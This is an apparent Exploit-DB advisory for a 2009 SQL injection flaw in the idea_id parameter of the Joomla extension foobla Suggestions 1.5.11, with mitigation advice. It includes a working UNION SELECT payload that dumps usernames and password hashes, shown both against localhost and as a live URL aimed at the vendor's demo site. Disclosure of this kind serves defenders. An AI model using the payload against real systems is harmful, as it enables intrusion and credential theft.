joomla component com_foobla_suggestions (idea_id) SQL Injection Vulnerability

vendor:

foobla Suggestions

by:

Chip D3 Bi0s

N/A

CVSS

N/A

SQL Injection

CWE

Product Name: foobla Suggestions

Affected Version From: 1.5.11

Affected Version To: 1.5.11

Patch Exists: NO

Related CWE: N/A

CPE: a:foobla:foobla_suggestions:1.5.11

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

joomla component com_foobla_suggestions (idea_id) SQL Injection Vulnerability

A vulnerability exists in the joomla component com_foobla_suggestions (idea_id) which allows an attacker to inject arbitrary SQL commands. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can result in the disclosure of sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

-----------------------------------------------------------------------------------------
joomla component com_foobla_suggestions (idea_id) SQL Injection Vulnerability
-----------------------------------------------------------------------------------------

Author         : Chip D3 Bi0s
Email          : chipdebios[alt+64]gmail.com
Date           : 15 September 2009
Critical Lvl   : Moderate
Impact	       : Exposure of sensitive information
Where	       : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : foobla Suggestions
version       : 1.5.11
Developer     : foobla
License       : GPL            type  : Commercial
Date Added    : 15 September 2009
Demo          : http://demo.foobla.com/foobla-suggestions-joomla/                            
Download      : http://foobla.com/products/featured-joomla-extensions/foobla-suggestions-for-joomla.html
Description   :

Have you ever used Uservoice? Would you like to have something
similar on Joomla but with unlimited features and no monthly fee?
The foobla Suggestions allows you to collect ideas, suggestions,
and votes from your cutomers. 
---------------------------------------------------------------------------


I.SQL injection (idea_id)
Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=[Sqlinjection]

[Sqlinjection]= null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users


Demo Live:
~~~~~~~
http://demo.foobla.com/foobla-suggestions-joomla/index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-09-16]